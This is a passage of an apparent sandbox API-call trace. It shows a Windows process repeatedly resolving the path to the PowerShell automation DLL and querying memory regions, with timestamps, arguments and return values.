lpBuffer=0x10c0e0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.885] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.885] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.885] VirtualQuery (in: lpAddress=0x10b190, lpBuffer=0x10c050, dwLength=0x30 | out: lpBuffer=0x10c050*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.885] VirtualQuery (in: lpAddress=0x10b220, lpBuffer=0x10c0e0, dwLength=0x30 | out: lpBuffer=0x10c0e0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.885] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.885] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.885] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.886] VirtualQuery (in: lpAddress=0x10b190, lpBuffer=0x10c050, dwLength=0x30 | out: lpBuffer=0x10c050*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.886] VirtualQuery (in: lpAddress=0x10b220, lpBuffer=0x10c0e0, dwLength=0x30 | out: lpBuffer=0x10c0e0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.887] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.887] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.887] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.887] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.887] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.888] VirtualQuery (in: lpAddress=0x10b190, lpBuffer=0x10c050, dwLength=0x30 | out: lpBuffer=0x10c050*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.889] VirtualQuery (in: lpAddress=0x10b220, lpBuffer=0x10c0e0, dwLength=0x30 | out: lpBuffer=0x10c0e0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.890] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.890] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.890] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.890] VirtualQuery (in: lpAddress=0x10b190, lpBuffer=0x10c050, dwLength=0x30 | out: lpBuffer=0x10c050*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.891] VirtualQuery (in: lpAddress=0x10b220, lpBuffer=0x10c0e0, dwLength=0x30 | out: lpBuffer=0x10c0e0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.891] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.891] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.891] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.894] VirtualQuery (in: lpAddress=0x10bc30, lpBuffer=0x10caf0, dwLength=0x30 | out: lpBuffer=0x10caf0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.897] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.897] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.897] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.898] VirtualQuery (in: lpAddress=0x10bc30, lpBuffer=0x10caf0, dwLength=0x30 | out: lpBuffer=0x10caf0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.900] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.900] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.900] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.901] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.907] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.908] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.908] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", 